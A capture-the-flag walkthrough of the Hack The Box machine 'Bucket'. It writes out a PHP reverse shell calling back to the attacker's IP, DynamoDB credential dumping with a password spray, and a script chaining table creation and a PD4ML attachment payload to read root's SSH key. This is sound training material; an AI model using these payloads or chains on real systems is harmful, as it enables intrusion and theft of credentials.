Bucket, as the name implies, features a simulated Amazon S3 bucket (served by LocalStack) that allows anonymous users to read and write the objects inside it. This lets me drop a web shell into the bucket to gain a foothold on the system. Enumerating the system uncovers several credentials stored in DynamoDB, one of which is reused by the user roy. Inspecting the web server configuration reveals an internal website running as root, which can be exploited through PD4ML to gain root access.

Skills Learned

- Pentesting AWS S3

- Port Forwarding

- Exploiting PD4ML

Tools

- Kali Linux (Attacking Machine) - https://www.kali.org/

- Nmap - Preinstalled in Kali Linux

- Gobuster - https://github.com/OJ/gobuster

- AWS CLI - https://docs.aws.amazon.com/cli/latest/userguide/install-cliv2-linux.html#cliv2-linux-install

Reconnaissance

Nmap

nmap shows two open ports: 22 (SSH) and 80 (HTTP).

→ root@iamf «bucket» «10.10.14.39»

$ mkdir nmap; nmap -sC -sV -oA nmap/initial-bucket 10.10.10.212

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)

80/tcp open http Apache httpd 2.4.41

| http-methods:

|_ Supported Methods: GET POST OPTIONS HEAD

|_http-server-header: Apache/2.4.41 (Ubuntu)

|_http-title: Site doesn't have a title (text/html).

Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scanning all ports returns the same result.

Enumeration

TCP 80 - bucket.htb

Visiting this port in a browser redirects to http://bucket.htb/:

→ root@iamf «bucket» «10.10.14.39»

$ curl -s http://10.10.10.212

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<html><head>

<title>302 Found</title>

</head><body>

<h1>Found</h1>

<p>The document has moved <a href="http://bucket.htb/">here</a>.</p>

<hr>

<address>Apache/2.4.41 (Ubuntu) Server at 10.10.10.212 Port 80</address>

</body></html>

I’ll add bucket.htb to /etc/hosts

10.10.10.212 bucket.htb



Now it displays a web page called “Bucket Advertising Platform”.



Inspecting the page source reveals another virtual host, s3.bucket.htb.

I’ll add it to /etc/hosts as well:

10.10.10.212 bucket.htb s3.bucket.htb
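Editing /etc/hosts by hand works fine, but a small helper makes it idempotent when revisiting the box. This is a minimal sketch of my own (add_hosts_entry is a hypothetical name, not a standard tool), assuming the usual "IP name..." one-mapping-per-line hosts format:

```shell
#!/bin/bash
# Hypothetical helper (not part of the original workflow):
#   add_hosts_entry IP NAME [HOSTS_FILE]
# Appends "IP<TAB>NAME" unless NAME is already mapped on an uncommented line.
# HOSTS_FILE defaults to /etc/hosts, which needs root to modify.
add_hosts_entry() {
  local ip="$1" name="$2" file="${3:-/etc/hosts}"
  # Exact field comparison, so "bucket.htb" does not match "s3.bucket.htb"
  if awk -v n="$name" '
      !/^[[:space:]]*#/ { for (i = 2; i <= NF; i++) if ($i == n) found = 1 }
      END { exit !found }
    ' "$file" 2>/dev/null; then
    echo "[=] $name is already in $file"
  else
    printf '%s\t%s\n' "$ip" "$name" >> "$file"
    echo "[+] Added $ip $name to $file"
  fi
}
```

Usage (as root): add_hosts_entry 10.10.10.212 bucket.htb, then add_hosts_entry 10.10.10.212 s3.bucket.htb. This writes two lines instead of one combined line; both forms are valid in /etc/hosts.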

Gobuster

There are no interesting results.

→ root@iamf «bucket» «10.10.14.39»

$ gobuster dir -u http://bucket.htb/ -x html,txt,bak -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt -o gobuster/gobuster-M-80

...<SNIP>...

/index.html (Status: 200) [Size: 5344]

/server-status (Status: 403) [Size: 275]

TCP 80 - s3.bucket.htb



Visiting the newly discovered hostname returns a JSON response.

Gobuster

A gobuster scan discovers a few web paths.

→ root@iamf «bucket» «10.10.14.39»

$ gobuster dir -u http://s3.bucket.htb/ -x html,txt,bak -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt -o gobuster/gobuster-vhost-M-80

...<SNIP>...

/shell (Status: 200) [Size: 0]

/health (Status: 200) [Size: 54]

/server-status (Status: 403) [Size: 275]



/shell



Visiting /shell redirects to http://444af250749d:4566/shell/.

With curl, the response includes a number of CORS-related HTTP headers:

→ root@iamf «~» «10.10.14.51»

$ curl -sv http://s3.bucket.htb/shell

...<SNIP>...

< refresh: 0; url=http://444af250749d:4566/shell/

< access-control-allow-origin: *

< access-control-allow-methods: HEAD,GET,PUT,POST,DELETE,OPTIONS,PATCH

< access-control-allow-headers: authorization,content-type,content-md5,cache-control,x-amz-content-sha256,x-amz-date,x-amz-security-token,x-amz-user-agent,x-amz-target,x-amz-acl,x-amz-version-id,x-localstack-target,x-amz-tagging

< access-control-expose-headers: x-amz-version-id

<

* Connection #0 to host s3.bucket.htb left intact

I added it to /etc/hosts, but the page still doesn’t load, which makes sense since the full port scan found nothing listening on 4566.

10.10.10.212 bucket.htb s3.bucket.htb 444af250749d

Searching some of the header names on Google reveals that they are used by Amazon S3, and x-localstack-target points to LocalStack, a tool that emulates AWS services locally.

Adding a trailing / to the URL (/shell/) loads a DynamoDB JavaScript Shell, which I’m not familiar with.



/health

/health is probably an endpoint to monitor the service status.

Foothold

Shell as www-data

AWS S3

S3 stands for Simple Storage Service, an object storage service offered by Amazon. To interact with S3, I’ll use the AWS CLI (the install guide is linked in the Tools section).

Usage in general:

aws [options] s3 <subcommand> [parameters]

I’ll start by listing the S3 buckets, but the command returns an error.

A bucket is a container for objects stored in Amazon S3. It looks like a folder but isn’t really one: S3 stores objects in a flat namespace, and “folders” are just key prefixes.

→ root@iamf «bucket» «10.10.14.39»

$ aws s3 ls --endpoint-url=http://s3.bucket.htb

You must specify a region. You can also configure your region by running "aws configure".

I can resolve this by running aws configure and filling in only the default region.

→ root@iamf «bucket» «10.10.14.39»

$ aws configure

AWS Access Key ID [None]:

AWS Secret Access Key [None]:

Default region name [None]: us-east-1

Default output format [None]:

Now it works and returns a bucket called adserver.

→ root@iamf «bucket» «10.10.14.39»

$ aws s3 ls --endpoint-url=http://s3.bucket.htb

2020-10-21 09:16:03 adserver
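Instead of storing a region with aws configure, the same settings can be passed per command through the standard AWS CLI environment variables. The sketch below wraps that in a hypothetical awsb function. The dummy key values are an assumption, included in case the CLI refuses to sign requests without credentials (the emulated endpoint is not expected to check them):

```shell
#!/bin/bash
# Hypothetical wrapper (my own naming): run any aws subcommand against the
# box's endpoint without "aws configure". AWS_DEFAULT_REGION,
# AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY are standard AWS CLI variables;
# the "dummy" key values are an assumption, not real credentials.
BUCKET_ENDPOINT="${BUCKET_ENDPOINT:-http://s3.bucket.htb}"

awsb() {
  # The assignments apply only to this single aws invocation
  AWS_DEFAULT_REGION=us-east-1 \
  AWS_ACCESS_KEY_ID=dummy \
  AWS_SECRET_ACCESS_KEY=dummy \
    aws --endpoint-url="$BUCKET_ENDPOINT" "$@"
}
```

With it, awsb s3 ls s3://adserver/images/ or awsb dynamodb list-tables behave like the full commands used in this post.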

I can also list the objects inside the adserver bucket.

→ root@iamf «bucket» «10.10.14.39»

$ aws s3 ls s3://adserver --endpoint-url=http://s3.bucket.htb

PRE images/

2020-10-21 09:22:04 5344 index.html

→ root@iamf «bucket» «10.10.14.39»

$ aws s3 ls s3://adserver/images/ --endpoint-url=http://s3.bucket.htb

2020-10-21 09:52:04 37840 bug.jpg

2020-10-21 09:52:04 51485 cloud.png

2020-10-21 09:52:04 16486 malware.png

These files are the same files seen previously on bucket.htb.

PHP Reverse Shell upload via S3

The cp subcommand copies files (objects) from the local machine to a bucket, and vice versa:

aws s3 cp <source> <target> [--options]

Since the bucket’s index.html matches the page served on bucket.htb, the bucket looks like the web root of the Apache server, so I’ll create a PHP test file and upload it to the bucket.

→ root@iamf «bucket» «10.10.14.39»

$ echo '<?php echo "IamF" ?>' > iamf-test.php

→ root@iamf «bucket» «10.10.14.39»

$ aws s3 cp ./iamf-test.php s3://adserver/ --endpoint-url=http://s3.bucket.htb

upload: ./iamf-test.php to s3://adserver/iamf-test.php

I can confirm the file was successfully uploaded with the subcommand ls.

→ root@iamf «bucket» «10.10.14.39»

$ aws s3 ls s3://adserver/ --endpoint-url=http://s3.bucket.htb

PRE images/

2021-04-22 14:05:15 21 iamf-test.php

2021-04-22 14:05:04 5344 index.html

The file is available at both http://s3.bucket.htb/adserver/iamf-test.php and http://bucket.htb/iamf-test.php, but the PHP code only executes on bucket.htb. A few minutes later my files got deleted, so there’s probably a cleanup job running.

→ root@iamf «bucket» «10.10.14.39»

$ curl -s http://s3.bucket.htb/adserver/iamf-test.php

<?php echo "IamF" ?>

→ root@iamf «bucket» «10.10.14.39»

$ curl -s http://bucket.htb/iamf-test.php

IamF

Now I can try to drop a PHP reverse shell.
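The shell file itself isn’t shown here. As a minimal sketch, assuming a bash one-liner is acceptable, the hypothetical helper below writes iamf.php pointing at my tun0 address and the port of the nc listener used below (10.10.14.39:9001):

```shell
#!/bin/bash
# Hypothetical helper: write a one-line PHP reverse shell.
# LHOST/LPORT default to my tun0 IP and the nc listener port.
LHOST="${LHOST:-10.10.14.39}"
LPORT="${LPORT:-9001}"

make_php_revshell() {
  local out="${1:-iamf.php}"
  # system() runs the string through /bin/sh, so "bash -c" is needed
  # for the bash-only /dev/tcp redirection
  printf '<?php system("bash -c '\''bash -i >& /dev/tcp/%s/%s 0>&1'\''"); ?>\n' \
    "$LHOST" "$LPORT" > "$out"
}
```

Running make_php_revshell creates ./iamf.php, which is then uploaded with aws s3 cp and triggered with curl.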

→ root@iamf «bucket» «10.10.14.39»

$ aws s3 cp ./iamf.php s3://adserver/ --endpoint-url=http://s3.bucket.htb

Then I’ll trigger it using curl.

→ root@iamf «bucket» «10.10.14.39»

$ curl -s http://bucket.htb/iamf.php

My listener catches a shell as www-data (if nothing connects back, wait a few minutes or re-upload the shell, since the cleanup may have removed it).

→ root@iamf «bucket» «10.10.14.39»

$ rlwrap nc -nvlp 9001

listening on [any] 9001 ...

connect to [10.10.14.39] from (UNKNOWN) [10.10.10.212] 58352

Linux bucket 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

18:14:02 up 13:18, 0 users, load average: 0.03, 0.04, 0.04

USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

uid=33(www-data) gid=33(www-data) groups=33(www-data)

bash: cannot set terminal process group (1050): Inappropriate ioctl for device

bash: no job control in this shell

www-data@bucket:/$

Privilege Escalation

Shell as roy

Enumeration

roy is the only user in this box.

www-data@bucket:/$ cat /etc/passwd | grep sh$

root:x:0:0:root:/root:/bin/bash

roy:x:1000:1000:,,,:/home/roy:/bin/bash

roy’s home directory contains a folder called project.

www-data@bucket:/var/www$ ls -la /home/roy

total 44

drwxr-xr-x 7 roy roy 4096 Apr 22 12:03 .

drwxr-xr-x 3 root root 4096 Sep 16 2020 ..

drwxrwxr-x 2 roy roy 4096 Apr 22 12:03 .aws

lrwxrwxrwx 1 roy roy 9 Sep 16 2020 .bash_history -> /dev/null

-rw-r--r-- 1 roy roy 220 Sep 16 2020 .bash_logout

-rw-r--r-- 1 roy roy 3771 Sep 16 2020 .bashrc

drwx------ 2 roy roy 4096 Apr 22 07:57 .cache

drwx------ 4 roy roy 4096 Apr 22 08:01 .gnupg

-rw-r--r-- 1 roy roy 807 Sep 16 2020 .profile

drwxr-xr-x 3 roy roy 4096 Apr 22 07:59 project

drwxr-xr-x 3 roy roy 4096 Apr 22 07:59 snap

-r-------- 1 roy roy 33 Apr 22 04:56 user.txt

The files inside project are readable by others.

www-data@bucket:/home/roy/project$ ls -la

total 44

drwxr-xr-x 3 roy roy 4096 Sep 24 2020 .

drwxr-xr-x 5 roy roy 4096 Apr 24 17:31 ..

-rw-rw-r-- 1 roy roy 63 Sep 24 2020 composer.json

-rw-rw-r-- 1 roy roy 20533 Sep 24 2020 composer.lock

-rw-r--r-- 1 roy roy 367 Sep 24 2020 db.php

drwxrwxr-x 10 roy roy 4096 Sep 24 2020 vendor

Looking into db.php, the project seems to use AWS DynamoDB as its database, and I can also see the endpoint URL.

www-data@bucket:/home/roy/project$ cat db.php

<?php

require 'vendor/autoload.php';

date_default_timezone_set('America/New_York');

use Aws\DynamoDb\DynamoDbClient;

use Aws\DynamoDb\Exception\DynamoDbException;

$client = new Aws\Sdk([

'profile' => 'default',

'region' => 'us-east-1',

'version' => 'latest',

'endpoint' => 'http://localhost:4566'

]);

$dynamodb = $client->createDynamoDb();

//todo

localhost:4566 is the internal endpoint behind s3.bucket.htb, and it reports both services as running:

www-data@bucket:/home/roy/project$ curl -s http://localhost:4566

{

"s3": "running",

"dynamodb": "running"

}

AWS DynamoDB

DynamoDB is a NoSQL database service from Amazon. I can use the AWS CLI to interact with DynamoDB as well, and it uses the same endpoint as S3.

General usage:

usage: aws [options] dynamodb <subcommand> [<subcommand> ...] [parameters]

Anonymous users are allowed to list the database tables.

→ root@iamf «bucket» «10.10.14.39»

$ aws dynamodb list-tables --endpoint-url http://s3.bucket.htb

{

"TableNames": [

"users"

]

}

I can read the content of table users with the subcommand scan, and it discovers several credentials.

→ root@iamf «bucket» «10.10.14.39»

$ aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb

{

"Items": [

{

"password": {

"S": "Management@#1@#"

},

"username": {

"S": "Mgmt"

}

},

{

"password": {

"S": "Welcome123!"

},

"username": {

"S": "Cloudadm"

}

},

{

"password": {

"S": "n2vM-<_K_Q:.Aa2"

},

"username": {

"S": "Sysadm"

}

}

],

"Count": 3,

"ScannedCount": 3,

"ConsumedCapacity": null

}

I’ll save those passwords to a file, passwords.list.
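The crackmapexec step reads passwords from passwords.list. One way to build it, sketched here under the assumption that the scan output is pretty-printed as above (each "S" value on its own line), is a small awk filter; extract_passwords is a hypothetical name:

```shell
#!/bin/bash
# Hypothetical helper: print every "password" value from the pretty-printed
# "aws dynamodb scan" output on stdin, one per line.
# Assumes no escaped quotes inside the values.
extract_passwords() {
  awk '
    /"password"[[:space:]]*:/ { want = 1; next }     # the next "S" line is a password
    want && /"S"[[:space:]]*:/ {
      v = $0
      sub(/^[^:]*:[[:space:]]*"/, "", v)             # strip up to the opening quote
      sub(/"[[:space:]]*,?[[:space:]]*$/, "", v)     # strip the closing quote (and comma)
      print v
      want = 0
    }
  '
}
```

Usage: aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb | extract_passwords > passwords.list. If jq is installed, jq -r '.Items[].password.S' does the same job more robustly, since it actually parses the JSON.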



SSH Access

The password n2vM-<_K_Q:.Aa2 (from the Sysadm entry) works for roy.

→ root@iamf «bucket» «10.10.14.39»

$ crackmapexec ssh '10.10.10.212' -u roy -p passwords.list

SSH 10.10.10.212 22 10.10.10.212 [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4

SSH 10.10.10.212 22 10.10.10.212 [-] roy:Management@#1@# Authentication failed.

SSH 10.10.10.212 22 10.10.10.212 [-] roy:Welcome123! Authentication failed.

SSH 10.10.10.212 22 10.10.10.212 [+] roy:n2vM-<_K_Q:.Aa2

Now I can log in to the system with roy’s credentials.

→ root@iamf «bucket» «10.10.14.39»

$ ssh roy@10.10.10.212

roy@10.10.10.212's password:

Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-48-generic x86_64)

...<SNIP>...

System load: 0.02

Usage of /: 33.8% of 17.59GB

Memory usage: 29%

Swap usage: 0%

Processes: 252

Users logged in: 0

IPv4 address for br-bee97070fb20: 172.18.0.1

IPv4 address for docker0: 172.17.0.1

IPv4 address for ens160: 10.10.10.212

IPv6 address for ens160: dead:beef::250:56ff:feb9:df48

...<SNIP>...

roy@bucket:~$ id

uid=1000(roy) gid=1000(roy) groups=1000(roy),1001(sysadm)

roy@bucket:~$

The user flag can be grabbed at this point.

Shell as root

Enumeration

Running LinPEAS discovers another service listening on port 8000.

[+] Active Ports

[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports

tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -

tcp 0 0 127.0.0.1:4566 0.0.0.0:* LISTEN -

tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -

tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -

tcp 0 0 127.0.0.1:46275 0.0.0.0:* LISTEN -

tcp6 0 0 :::80 :::* LISTEN -

tcp6 0 0 :::22 :::* LISTEN -
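The interesting entries are the ones bound to loopback, since they are only reachable from the box itself. A minimal sketch for filtering them out of netstat/ss-style output (loopback_listeners is a hypothetical name; it relies on the local address being the 4th column, as it is in both netstat -tln and ss -tln):

```shell
#!/bin/bash
# Sketch: print the local address of every listener bound to loopback
# (127.x.x.x or ::1). Reads netstat/ss-style lines on stdin.
loopback_listeners() {
  # [[]? and []]? allow the brackets ss puts around IPv6 addresses
  awk '$4 ~ /^127\./ || $4 ~ /^[[]?::1[]]?:/ { print $4 }'
}
```

On the box, ss -tln | loopback_listeners should list 127.0.0.1:8000 alongside 4566 and the other loopback-only ports.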

It also finds that /var/www/bucket-app belongs to root and is readable by roy but not by others (the + in the permissions means an ACL is set, which is presumably how roy gets access).

[+] Readable files belonging to root and readable by me but not world readable

-rwxr-x---+ 1 root root 808729 Jun 10 2020 /var/www/bucket-app/pd4ml_demo.jar

-rw-r-x---+ 1 root root 358 Aug 6 2016 /var/www/bucket-app/vendor/psr/http-message/README.md

-rw-r-x---+ 1 root root 1085 Aug 6 2016 /var/www/bucket-app/vendor/psr/http-message/LICENSE

-rw-r-x---+ 1 root root 4689 Aug 6 2016 /var/www/bucket-app/vendor/psr/http-message/src/UploadedFileInterface.php

-rw-r-x---+ 1 root root 4746 Aug 6 2016 /var/www/bucket-app/vendor/psr/http-message/src/StreamInterface.php

I can list the contents of bucket-app:

roy@bucket:/var/www/bucket-app$ ls -la

total 856

drwxr-x---+ 4 root root 4096 Feb 10 12:29 .

drwxr-xr-x 4 root root 4096 Feb 10 12:29 ..

-rw-r-x---+ 1 root root 63 Sep 23 2020 composer.json

-rw-r-x---+ 1 root root 20533 Sep 23 2020 composer.lock

drwxr-x---+ 2 root root 4096 Apr 22 12:38 files

-rwxr-x---+ 1 root root 17222 Sep 23 2020 index.php

-rwxr-x---+ 1 root root 808729 Jun 10 2020 pd4ml_demo.jar

drwxr-x---+ 10 root root 4096 Feb 10 12:29 vendor

According to the Apache config file, the service on port 8000 is an internal website served from /var/www/bucket-app, and the mpm_itk AssignUserId directive assigns it to the root user. In other words, its PHP code runs as root.

roy@bucket:~$ cat /etc/apache2/sites-available/000-default.conf

<VirtualHost 127.0.0.1:8000> # unknown

<IfModule mpm_itk_module>

AssignUserId root root

</IfModule>

DocumentRoot /var/www/bucket-app

</VirtualHost>

<VirtualHost *:80> # bucket.htb

DocumentRoot /var/www/html

RewriteEngine On

RewriteCond %{HTTP_HOST} !^bucket.htb$

RewriteRule /.* http://bucket.htb/ [R]

</VirtualHost>

<VirtualHost *:80> # s3.bucket.htb

ProxyPreserveHost on

ProxyPass / http://localhost:4566/

ProxyPassReverse / http://localhost:4566/

<Proxy *>

Order deny,allow

Allow from all

</Proxy>

ServerAdmin webmaster@localhost

ServerName s3.bucket.htb

ErrorLog ${APACHE_LOG_DIR}/error.log

CustomLog ${APACHE_LOG_DIR}/access.log combined

</VirtualHost>
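With more sites enabled, the same check can be scripted. This sketch (vhost_run_as is a hypothetical name) prints each VirtualHost that carries an mpm_itk AssignUserId, assuming one directive per line as in the config above:

```shell
#!/bin/bash
# Sketch: print "vhost -> user:group" for every <VirtualHost> block that
# sets an mpm_itk AssignUserId. Takes Apache config files as arguments.
vhost_run_as() {
  awk '
    /^[[:space:]]*<VirtualHost/  { vh = $2; sub(/>$/, "", vh) }  # remember current vhost
    /^[[:space:]]*AssignUserId/  { print vh, "->", $2 ":" $3 }   # user and group
  ' "$@"
}
```

For this box, vhost_run_as /etc/apache2/sites-available/000-default.conf should print 127.0.0.1:8000 -> root:root.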

Internal Web

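I’ll forward the internal website to the same port on my machine through an SSH tunnel. Since I already have an SSH session as roy, I can add the forward on the fly with the ~C escape sequence (typed at the start of a line) instead of reconnecting: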

roy@bucket:/var/www/bucket-app$ ~C

ssh> -L 8000:127.0.0.1:8000

Forwarding port.

roy@bucket:/var/www/bucket-app$
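The escape sequence only works inside an existing interactive session. When starting fresh, the same forward can be set up with ssh -N -L 8000:127.0.0.1:8000 roy@10.10.10.212, or stored in ssh_config. The sketch below appends such a stanza; the bucket alias and the add_bucket_tunnel name are my own choices:

```shell
#!/bin/bash
# Hypothetical helper: append an ssh_config stanza so that "ssh bucket"
# logs in as roy and forwards local port 8000 to 127.0.0.1:8000 on Bucket.
# The config path defaults to ~/.ssh/config.
add_bucket_tunnel() {
  local config="${1:-$HOME/.ssh/config}"
  cat >> "$config" <<'EOF'
Host bucket
    HostName 10.10.10.212
    User roy
    LocalForward 8000 127.0.0.1:8000
EOF
}
```

After add_bucket_tunnel, ssh -N bucket opens only the tunnel (-N skips running a remote command), and http://127.0.0.1:8000/ on my machine reaches the internal site.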

The page says the site is under construction.

Source Code Review

Reviewing index.php shows how this website can be abused.

roy@bucket:/var/www/bucket-app$ cat index.php

<?php

require 'vendor/autoload.php';

use Aws\DynamoDb\DynamoDbClient;

if($_SERVER["REQUEST_METHOD"]==="POST") {

if($_POST["action"]==="get_alerts") { # POST action=get_alerts

date_default_timezone_set('America/New_York');

$client = new DynamoDbClient([ # Connect to DynamoDB.

'profile' => 'default',

'region' => 'us-east-1',

'version' => 'latest',

'endpoint' => 'http://localhost:4566'

]);

$iterator = $client->getIterator('Scan', array( # Read content from table alerts

'TableName' => 'alerts',

'FilterExpression' => "title = :title", # Filter by title

'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),

));

foreach ($iterator as $item) { #

$name=rand(1,10000).'.html'; # Generate randomnumber.html

file_put_contents('files/'.$name,$item["data"]); # Write contents to randomnumber.html

}

passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf"); # convert randomnumber.html to result.pdf

}

}

else

{

?>

...<SNIP>...

When a POST request contains action=get_alerts, the following snippet creates a DynamoDB client.

if($_SERVER["REQUEST_METHOD"]==="POST") {

if($_POST["action"]==="get_alerts") { # POST action=get_alerts

date_default_timezone_set('America/New_York');

$client = new DynamoDbClient([ # Connect to DynamoDB.

'profile' => 'default',

'region' => 'us-east-1',

'version' => 'latest',

'endpoint' => 'http://localhost:4566'

]);

It then scans every item in the alerts table and keeps only those whose title attribute is the string “Ransomware”.

DynamoDB is a key-value NoSQL database.

$iterator = $client->getIterator('Scan', array( # Read content from table alerts

'TableName' => 'alerts',

'FilterExpression' => "title = :title", # Filter by title

'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),

));

For each matching item, it writes the item’s data attribute ($item["data"]) to a randomly named HTML file in files/.

foreach ($iterator as $item) { #

$name=rand(1,10000).'.html'; # Generate randomnumber.html

file_put_contents('files/'.$name,$item["data"]); # Write contents to randomnumber.html

}

The HTML file is then converted into a PDF file (files/result.pdf) using pd4ml. Note that passthru() sits outside the loop, so only the last file written gets converted.

passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf"); # convert randomnumber.html to result.pdf

From the DynamoDB enumeration above, I know there is no alerts table yet.

The idea: if I can create the alerts table and write to it, I control the HTML that pd4ml renders. Since the web application runs as root, I can abuse this to read almost any file on the system (arbitrary file read).

Obtain root SSH Key

First I’ll try creating a dummy table in the database. I’ll define it in JSON and save it to a file called test-table.json:

{

"TableName": "iamf",

"AttributeDefinitions":

[

{ "AttributeName": "Name", "AttributeType" : "S" }

],

"KeySchema":

[

{ "AttributeName": "Name", "KeyType" : "HASH" }

],

"ProvisionedThroughput" :

{ "WriteCapacityUnits": 5, "ReadCapacityUnits": 10 }

}

Now I can use the subcommand create-table with --cli-input-json option and supply the JSON file on it.

→ root@iamf «bucket» «10.10.14.39»

$ aws dynamodb create-table --cli-input-json file://test-table.json --endpoint-url http://s3.bucket.htb

{

"TableDescription": {

"AttributeDefinitions": [

{

"AttributeName": "Name",

"AttributeType": "S"

}

],

"TableName": "iamf",

"KeySchema": [

{

"AttributeName": "Name",

"KeyType": "HASH"

}

],

"TableStatus": "ACTIVE",

"CreationDateTime": "2021-04-22T15:22:33.634000-04:00",

...<SNIP>...

Using the list-tables subcommand, I can confirm that the table has been created, which means anonymous users can also write to the database.

→ root@iamf «bucket» «10.10.14.39»

$ aws dynamodb list-tables --endpoint-url http://s3.bucket.htb

{

"TableNames": [

"iamf",

"users"

]

}

Knowing this, I can now create the alerts table, again defined in JSON.

alerts-table.json:

{

"TableName": "alerts",

"AttributeDefinitions":

[

{"AttributeName": "title", "AttributeType" : "S"},

{"AttributeName": "data", "AttributeType" : "S"}

],

"KeySchema":

[

{"AttributeName": "title", "KeyType" : "HASH"},

{"AttributeName": "data", "KeyType" : "RANGE"}

],

"ProvisionedThroughput" :

{"WriteCapacityUnits": 5, "ReadCapacityUnits": 10}

}

To abuse the application for file read, I’ll put the path of root’s SSH private key inside a <pd4ml:attachment> tag, which PD4ML uses to embed a file into the generated PDF. I’ll write the item in JSON format and name it payload.json.

payload.json

{

"title": { "S": "Ransomware" },

"data": { "S": "<pd4ml:attachment>file:///root/.ssh/id_rsa</pd4ml:attachment>" }

}
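To read files other than root’s key, the item can be generated for any path. A minimal sketch (make_payload is a hypothetical name), assuming the path contains no double quotes or backslashes, since it does no JSON escaping:

```shell
#!/bin/bash
# Hypothetical helper: write the DynamoDB item (payload.json format above)
# that makes pd4ml attach an arbitrary local file to result.pdf.
# No JSON escaping is done; keep paths free of quotes and backslashes.
make_payload() {
  local target="$1" out="${2:-payload.json}"
  printf '{\n  "title": { "S": "Ransomware" },\n  "data": { "S": "<pd4ml:attachment>file://%s</pd4ml:attachment>" }\n}\n' \
    "$target" > "$out"
}
```

make_payload /root/.ssh/id_rsa reproduces the payload.json above; make_payload /etc/shadow would target a different file with the same chain.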

Finally, because a cleanup script on the box keeps removing my changes, I’ll chain the steps in a bash script so they run back to back. I’ll name the script getroot.sh.

getroot.sh

#!/bin/bash

# Run every step back to back, before the box's cleanup script removes the alerts table

echo "[+] Create table"

aws dynamodb create-table --cli-input-json file://alerts-table.json --endpoint-url=http://s3.bucket.htb >/dev/null

sleep 0.5

echo "[+] Insert item"

aws dynamodb put-item --table-name alerts --item file://payload.json --endpoint-url=http://s3.bucket.htb >/dev/null

sleep 0.5

echo "[+] Send get alerts"

curl -svd "action=get_alerts" http://127.0.0.1:8000/ # port 8000 on Bucket, forwarded to localhost:8000 over SSH

The script assumes all the required files are in the current working directory.

I’ll watch for result.pdf in /var/www/bucket-app/files and grab the SSH key from roy’s session.

roy@bucket:/var/www/bucket-app/files$ while sleep 2; do sed -n '/^-----BEGIN OPENSSH PRIVATE KEY-----$/,/^-----END OPENSSH PRIVATE KEY-----$/p' * 2>/dev/null; done

Now I can just execute the getroot.sh script and wait for it to complete.

→ root@iamf «bucket» «10.10.14.39»

$ ./getroot.sh

[+] Create table

[+] Insert item

[+] Send get alerts

* Trying 127.0.0.1:8000...

* TCP_NODELAY set

* Connected to 127.0.0.1 (127.0.0.1) port 8000 (#0)

> POST / HTTP/1.1

> Host: 127.0.0.1:8000

> User-Agent: curl/7.66.0

> Accept: */*

> Content-Length: 17

> Content-Type: application/x-www-form-urlencoded

>

* upload completely sent off: 17 out of 17 bytes

* Mark bundle as not supporting multiuse

< HTTP/1.1 200 OK

< Date: Thu, 22 Apr 2021 20:04:14 GMT

< Server: Apache/2.4.41 (Ubuntu)

< Content-Length: 0

< Content-Type: text/html; charset=UTF-8

<

* Connection #0 to host 127.0.0.1 left intact

In roy’s shell, the SSH key shows up.

roy@bucket:/var/www/bucket-app/files$ while sleep 1; do sed -n '/^-----BEGIN OPENSSH PRIVATE KEY-----$/,/^-----END OPENSSH PRIVATE KEY-----$/p' * 2>/dev/null; done

-----BEGIN OPENSSH PRIVATE KEY-----

b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn

...<SNIP>...

-----END OPENSSH PRIVATE KEY-----

The full process is shown below:

I’ll save that key as root_rsa and change its permissions to 600.

→ root@iamf «bucket» «10.10.14.39»

$ chmod 600 root_rsa
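Copying the key out of the terminal by hand is error-prone, so here is a sketch that cuts the key block out of a file with the same sed range as the watch loop and saves it with the permissions ssh requires. extract_key is a hypothetical name, and it assumes the key text appears unencoded in the source file, as it did in the loop above:

```shell
#!/bin/bash
# Hypothetical helper: extract_key SRC [OUT]
# Copies the OpenSSH private key block from SRC into OUT (default root_rsa).
extract_key() {
  local src="$1" out="${2:-root_rsa}"
  # umask 077 in a subshell so the key file is never group/world-readable
  (umask 077 && sed -n '/^-----BEGIN OPENSSH PRIVATE KEY-----$/,/^-----END OPENSSH PRIVATE KEY-----$/p' "$src" > "$out")
  chmod 600 "$out"   # also tightens a pre-existing file
  [ -s "$out" ]      # non-zero exit status if no key block was found
}
```

For example, after pasting the loop’s output into key.txt: extract_key key.txt root_rsa.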

After that, I can log in as root using the SSH key I obtained.

→ root@iamf «bucket» «10.10.14.39»

$ ssh -i root_rsa root@10.10.10.212

Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-48-generic x86_64)

...<SNIP>...

IPv4 address for br-bee97070fb20: 172.18.0.1

IPv4 address for docker0: 172.17.0.1

IPv4 address for ens160: 10.10.10.212

IPv6 address for ens160: dead:beef::250:56ff:feb9:df48

...<SNIP>...

root@bucket:~# id;hostname;cut -c-15 root.txt

uid=0(root) gid=0(root) groups=0(root)

bucket

efc73dd09ceb705